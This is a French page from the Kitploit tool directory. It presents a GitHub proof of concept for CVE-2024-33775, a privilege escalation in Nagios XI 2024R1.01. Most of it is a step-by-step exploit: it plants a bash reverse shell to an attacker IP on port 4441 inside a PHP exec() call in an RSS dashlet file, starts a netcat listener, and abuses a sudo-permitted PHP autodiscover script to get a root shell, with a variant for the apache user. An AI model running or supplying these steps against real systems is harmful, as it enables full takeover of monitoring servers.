Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-33775 — Escalade de privilèges pour Nagios XI 2024R1.01, permettant un accès root complet depuis les utilisateurs NAGIOS ou APACHE via une injection malveillante de dashlet RSS et l'exécution de commandes sudo. | Kitploit
Outils/GitHubGitHub/neo-xed/cve-2024-33775
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubneo-xed/cve-2024-33775

CVE-2024-33775

Escalade de privilèges pour Nagios XI 2024R1.01, permettant un accès root complet depuis les utilisateurs NAGIOS ou APACHE via une injection malveillante de dashlet RSS et l'exécution de commandes sudo.

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE découverte par : K. Wahab (Neo`X)

Détails de la vulnérabilité :

  • Produit : Nagios XI Version 2024R1.01
  • Vulnérabilité : Élévation de privilèges depuis les utilisateurs « NAGIOS » ou « APACHE »
  • Résultat : Accès root complet sur le système cible
  • CVE : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33775

Exploitation :

Le RSS Dashlet est utilisé dans cet exemple.

1. Créer une nouvelle instance de Nagios XI :

  • Vous pouvez télécharger le fichier OVA de Nagios XI Version 2024R1.01 depuis : https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova

2. Élévation de privilèges :

Exploitation en tant que NAGIOS :

  • Ajoutez dans le fichier .inc.php du dashlet dans "/usr/local/nagiosxi/html/includes/dashlets/" le contenu suivant :
root@kitploit:~
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
  • Démarrez un serveur d'écoute Netcat sur la machine de l'attaquant :
root@kitploit:~
nc -nlvp 4441
  • Exécutez la commande suivante pour élever les privilèges et recevoir une connexion en tant que root :
root@kitploit:~
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1

Exploitation en tant qu'APACHE :

  • Accédez à la page de gestion des dashlets et téléchargez un Dashlet :

    root@kitploit:~
    http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
    
  • Modifiez le fichier *.inc.php :

    root@kitploit:~
    exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");
    

Dashlet_inc_php

  • Démarrez un serveur d'écoute Netcat sur la machine de l'attaquant :
root@kitploit:~
nc -nlvp 4441
  • Téléversez le dashlet malveillant dans la page de gestion des dashlets et attendez la connexion en tant qu'utilisateur APACHE.
  • Exécutez la commande suivante pour élever les privilèges et recevoir une connexion en tant que root :
root@kitploit:~
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1

(Remarque : après avoir exécuté la commande, vous recevrez une connexion en tant qu'APACHE, utilisez CTRL+C pour quitter et redémarrez le listener à plusieurs reprises)

Apache_root

Télécharger l’outil